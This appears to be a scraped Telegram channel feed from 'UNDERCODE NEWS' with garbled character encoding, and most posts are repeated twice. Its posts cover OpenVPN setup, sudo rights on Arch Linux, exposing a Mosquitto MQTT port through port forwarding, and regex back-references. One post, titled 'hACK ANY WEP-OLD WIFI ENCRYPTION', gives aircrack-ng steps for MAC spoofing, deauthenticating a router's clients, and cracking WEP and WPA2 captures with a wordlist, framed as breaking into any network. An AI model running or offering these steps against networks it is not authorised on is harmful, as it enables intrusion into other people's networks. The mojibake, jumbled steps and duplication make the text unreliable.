Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
OpenVPN USE VPN FROM YOUR CHOICE- LINUX-TERMUX:
1) Open terminal and type
apt-get install openvpn
2) configure
* test vpn
server # openvpn --remote CLIENT --dev tun1 --ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
client # openvpn --remote SERVER --dev tun1 --ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
then check ifconfig
* static key vpn
Server
3) cd /etc/openvpn
4) openvpn --genkey --secret static.key
5) cat > tun0.conf << EOF
6) REMOTE
dev tun0
ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
secret /etc/openvpn/static.key
7) EOF
cp server:/etc/openvpn/static.key client:/etc/openvpn/static.key
Client
cd /etc/openvpn
cat > tun0.conf << EOF
8) SERVER
dev tun0
ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
secret /etc/openvpn/static.key
9) Firewall
UDP:1149
Test on both sides
openvpn --config /etc/openvpn/tun0.conf --verb 6
ref : wiki.debian.org :: openvpn
wiki.archlinux.org :: openvpn
β β β Uππ»βΊπ«Δπ¬πβ β β β
OpenVPN USE VPN FROM YOUR CHOICE- LINUX-TERMUX:
1) Open terminal and type
apt-get install openvpn
2) configure
* test vpn
server # openvpn --remote CLIENT --dev tun1 --ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
client # openvpn --remote SERVER --dev tun1 --ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
then check ifconfig
* static key vpn
Server
3) cd /etc/openvpn
4) openvpn --genkey --secret static.key
5) cat > tun0.conf << EOF
6) REMOTE
dev tun0
ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
secret /etc/openvpn/static.key
7) EOF
cp server:/etc/openvpn/static.key client:/etc/openvpn/static.key
Client
cd /etc/openvpn
cat > tun0.conf << EOF
8) SERVER
dev tun0
ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
secret /etc/openvpn/static.key
9) Firewall
UDP:1149
Test on both sides
openvpn --config /etc/openvpn/tun0.conf --verb 6
ref : wiki.debian.org :: openvpn
wiki.archlinux.org :: openvpn
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π₯ Add, remove and grant sudo rights to Arch Linux users:
1) How to add, remove and grant sudo rights to users on Arch Linux
Make sure you have installed the sudo package by running the following commands as root:
# pacman -Syu
# pacman -S sudo
2) The first command will sync the repositories and update your Arch Linux system to the latest version available.
The second command will install sudo if not already installed.
π¦Then create a new user and add sudo rights to it.
1) / Create a sudo user on Arch Linux.
Run the following command to create a new user, for example undercode:
# useradd --create-home undercode
2) Set a password for the new user:
# passwd undercode
3) We have created a new user named undercode.
We haven't given the user sudo rights yet.
4) You can check if a user is a sudo user or not using the command:
# sudo -lU undercode
Output example:
5) User undercode is not allowed to run sudo on archlinux.
Yes, the user is not yet allowed to perform administrative tasks.
Let's go ahead and give it sudo rights.
To add a regular user to the sudoers list, simply add him to the wheel group.
6) For those of you curious, wheel is a special group on some Unix-like operating systems.
All members to this group are allowed to perform administrative tasks.
The Wheel group is similar to the sudo group on Debian based systems.
We can add users to the sudoers list in two ways.
7) 4The first way is to use the usermod command.
1.1. Add users to the sudoers list using the usermod command on Arch Linux
To add a user to the sudoers list on Arch Linux, run:
# usermod -aG wheel undercode
or
# usermod --append --groups wheel undercode
The above command will add a user named undercode to the "wheel" group.
As mentioned, members of the wheel group can perform administrative tasks using the sudo command.
Then edit the / etc / sudoers file with the command:
# visudo
Find and uncomment the following line (just remove the # at the beginning of the line):
%wheel ALL=(ALL) ALL
Press ESC and type: wq to save the file and exit.
You can also add the user to the sudo group:
# usermod -aG sudo undercode
Edit the / etc / sudoers file:
# visudo
Uncomment the following line:
%sudo ALL=(ALL) ALL
Save the file and exit.
We have added the user undercode to the sudoers list.
Now go to section β1.3. Let's check if the user has sudo access on Arch Linux βand check if the user has sudo rights.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π₯ Add, remove and grant sudo rights to Arch Linux users:
1) How to add, remove and grant sudo rights to users on Arch Linux
Make sure you have installed the sudo package by running the following commands as root:
# pacman -Syu
# pacman -S sudo
2) The first command will sync the repositories and update your Arch Linux system to the latest version available.
The second command will install sudo if not already installed.
π¦Then create a new user and add sudo rights to it.
1) / Create a sudo user on Arch Linux.
Run the following command to create a new user, for example undercode:
# useradd --create-home undercode
2) Set a password for the new user:
# passwd undercode
3) We have created a new user named undercode.
We haven't given the user sudo rights yet.
4) You can check if a user is a sudo user or not using the command:
# sudo -lU undercode
Output example:
5) User undercode is not allowed to run sudo on archlinux.
Yes, the user is not yet allowed to perform administrative tasks.
Let's go ahead and give it sudo rights.
To add a regular user to the sudoers list, simply add him to the wheel group.
6) For those of you curious, wheel is a special group on some Unix-like operating systems.
All members to this group are allowed to perform administrative tasks.
The Wheel group is similar to the sudo group on Debian based systems.
We can add users to the sudoers list in two ways.
7) 4The first way is to use the usermod command.
1.1. Add users to the sudoers list using the usermod command on Arch Linux
To add a user to the sudoers list on Arch Linux, run:
# usermod -aG wheel undercode
or
# usermod --append --groups wheel undercode
The above command will add a user named undercode to the "wheel" group.
As mentioned, members of the wheel group can perform administrative tasks using the sudo command.
Then edit the / etc / sudoers file with the command:
# visudo
Find and uncomment the following line (just remove the # at the beginning of the line):
%wheel ALL=(ALL) ALL
Press ESC and type: wq to save the file and exit.
You can also add the user to the sudo group:
# usermod -aG sudo undercode
Edit the / etc / sudoers file:
# visudo
Uncomment the following line:
%sudo ALL=(ALL) ALL
Save the file and exit.
We have added the user undercode to the sudoers list.
Now go to section β1.3. Let's check if the user has sudo access on Arch Linux βand check if the user has sudo rights.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
hACK ANY WEP-OLD WIFI ENCRYPTION :
1.1
# airmon-ng --> inspect wireless network devices
1.2
# airmon-ng stop wlan0 OR # ifconfig wlan0 down --> shut down wlan0
1.3
change MAC
ifconfig ? ip ?
1.4 re-start wlan0
airmon-ng start wlan0
hint: rfkill - may cause issue.
1.5 dump avaliable network near.
airodump-ng wlan0
1.6 choose target
airodump-ng βc 1 βw wireless --bssid aa:bb:cc:dd:ee:ff mon0
new window aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
1.7 crack
aircrack-ng -b MAC wireless-01.cap
2. WPA2
2.1
prepare mon0
2.2 capture packets
airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 mon0
2.3 attack router using Deauth
aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33:44:55 mon0
2.4 crack
aircrack-ng -w ./dic/wordlist wirelessattack-01.cap
3. using gerix wifi cracker
it is a frontend for aircrack-ng
β β β Uππ»βΊπ«Δπ¬πβ β β β
hACK ANY WEP-OLD WIFI ENCRYPTION :
1.1
# airmon-ng --> inspect wireless network devices
1.2
# airmon-ng stop wlan0 OR # ifconfig wlan0 down --> shut down wlan0
1.3
change MAC
ifconfig ? ip ?
1.4 re-start wlan0
airmon-ng start wlan0
hint: rfkill - may cause issue.
1.5 dump avaliable network near.
airodump-ng wlan0
1.6 choose target
airodump-ng βc 1 βw wireless --bssid aa:bb:cc:dd:ee:ff mon0
new window aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
1.7 crack
aircrack-ng -b MAC wireless-01.cap
2. WPA2
2.1
prepare mon0
2.2 capture packets
airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 mon0
2.3 attack router using Deauth
aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33:44:55 mon0
2.4 crack
aircrack-ng -w ./dic/wordlist wirelessattack-01.cap
3. using gerix wifi cracker
it is a frontend for aircrack-ng
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Infinite Labor Court staff: claim to buy shares from them in the sum of NIS 4.4 million.
#International
#International
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Allow Connection from Outside Local Network to your linux :
Setting up the MOSQUITTO MQTT Server in Ubuntu 18.04 is actually not hard, but the steps are important.
Step 1: Install Mosquitto Software
pgrep mosquitto
[Note, if any number shows, that is the PID of an already running Mosquitto. You can just kill it. Also, you can try: sudo service mosquitto stop]
Step 4: Start Mosquitto with verbose option
use either: www.yougetsignal.com/tools/open-ports/ or https://canyouseeme.org/
[NOTE: You will not get an OPEN state UNLESS THE MOSQUITTO BROKER IS RUNNING]
Step 7: If Port Shows Closed When coming In from Internet (ie not localhost)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Allow Connection from Outside Local Network to your linux :
Setting up the MOSQUITTO MQTT Server in Ubuntu 18.04 is actually not hard, but the steps are important.
Step 1: Install Mosquitto Software
sudo apt-add-repository ppa:mosquitto-dev/mosquitto-ppaStep 2: Open Port 1883 and start firewall
sudo apt-get update
sudo apt-get install mosquitto
sudo ufw allow 1883Step 3: Verify Mosquitto is not already running
sudo ufw enable
pgrep mosquitto
[Note, if any number shows, that is the PID of an already running Mosquitto. You can just kill it. Also, you can try: sudo service mosquitto stop]
Step 4: Start Mosquitto with verbose option
mosquitto -vStep 5: Check connectivity using local host
[Note: This starts Mosquitto without using any config file. It echos connection and status information to the screen. Easiest for quick debugging.]
Go to your client machine (in my case a Windows 10 laptop) and run the MQTT client, connecting to the local address of the Linux Mosquitto server (in my case 192.168.0.144). You should be able to connect. In fact, you can do this step before you even open the firewall, since this is all on the local network, the firewall rules are irrelevant at this point. Until next step which is...Step 6: Check Connectivity using web tool
use either: www.yougetsignal.com/tools/open-ports/ or https://canyouseeme.org/
[NOTE: You will not get an OPEN state UNLESS THE MOSQUITTO BROKER IS RUNNING]
Step 7: If Port Shows Closed When coming In from Internet (ie not localhost)
Here's where I got tripped up. In my case, I have a Verizon Modem that ALSO has a firewall (because it has a router). I have my own wireless router, a tp-link Archer C1200, that I have plugged into the Fios Modem/Router. I started by putting the port forwarding in the tp-link. But that firewall comes after the Fios firewall so I needed to go to the first wall and do the port forward there.: stackoverflow
And this is the second thing that is tricky. All of the online how-to's said I should forward port 1883 to the local IP address of my Linux Server, which in my case was 192.168.0.144. But that was not correct in my case. The Archer C1200 was actually the device that I needed to forward to -- it handled the correct distribution from there. It had an address of 192.168.0.152 assigned to it from the Verizon router. I still have both forwardings in place (ie the Fios and the tp-link) and my guess is that I need them both.
Ref
β β β Uππ»βΊπ«Δπ¬πβ β β β
Yougetsignal
Open Port Check Tool - Test Port Forwarding on Your Router
Port checker is a utility used to identify your external IP address and detect open ports on your connection. This tool is useful for finding out if your port forwarding is setup correctly or if your server applications are being blocked by a firewall.
Forwarded from UNDERCODE NEWS
information protection management system certification, reducing unnecessary procedures and strengthening the internal stability.
#Updates
#Updates
Forwarded from UNDERCODE NEWS
What lesson has the iPhone learnt from losing it in the bath?
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Just a important tip:
Many programming languages ββsupport string manipulation using regular expressions :
For example, a powerful regular expression engine is built in Perl. The concept of regular expressions was first popularized by tools in Unix (such as sed and grep). Regular expressions are usually abbreviated as "regex". The singular includes regexp and regex, and the plural includes regexps, regexes, and regexen.
π»π΄π 'π π π π°π π :
Front-end development, will inevitably encounter label needs to match the needs of simple needs, not just two angle brackets wrap a label name Well, the next meal operation, /<[\w]+>.*<\/[\w]+>/gand perfectly matched <div>xx</div>and so on, the demand for complete ...
Etc., first glance, it does currently can match a variety of labels, but it also can match similar <div>xx</p>content. This means that we need to keep the content in the two angle brackets the same.
Regular grouping back-reference grouping ()
The so-called grouping is to put the content to be matched in brackets (). The content in parentheses can be regarded as a whole sub-expression
/<([\w]+)>.*<\/([\w]+)>/g
Back reference \N
Regular expressions also provide a mechanism for referencing previous matching groups. Sometimes, we may find a submatch, which will reappear next.
Β»
var reg = /<([\w]+)>.*<\/\1>/
reg.test('<div>xx</div>') // true
reg.test('<div>xx</p>') // false
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Just a important tip:
Many programming languages ββsupport string manipulation using regular expressions :
For example, a powerful regular expression engine is built in Perl. The concept of regular expressions was first popularized by tools in Unix (such as sed and grep). Regular expressions are usually abbreviated as "regex". The singular includes regexp and regex, and the plural includes regexps, regexes, and regexen.
π»π΄π 'π π π π°π π :
Front-end development, will inevitably encounter label needs to match the needs of simple needs, not just two angle brackets wrap a label name Well, the next meal operation, /<[\w]+>.*<\/[\w]+>/gand perfectly matched <div>xx</div>and so on, the demand for complete ...
Etc., first glance, it does currently can match a variety of labels, but it also can match similar <div>xx</p>content. This means that we need to keep the content in the two angle brackets the same.
Regular grouping back-reference grouping ()
The so-called grouping is to put the content to be matched in brackets (). The content in parentheses can be regarded as a whole sub-expression
/<([\w]+)>.*<\/([\w]+)>/g
Back reference \N
Regular expressions also provide a mechanism for referencing previous matching groups. Sometimes, we may find a submatch, which will reappear next.
Β»
var reg = /<([\w]+)>.*<\/\1>/
reg.test('<div>xx</div>') // true
reg.test('<div>xx</p>') // false
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS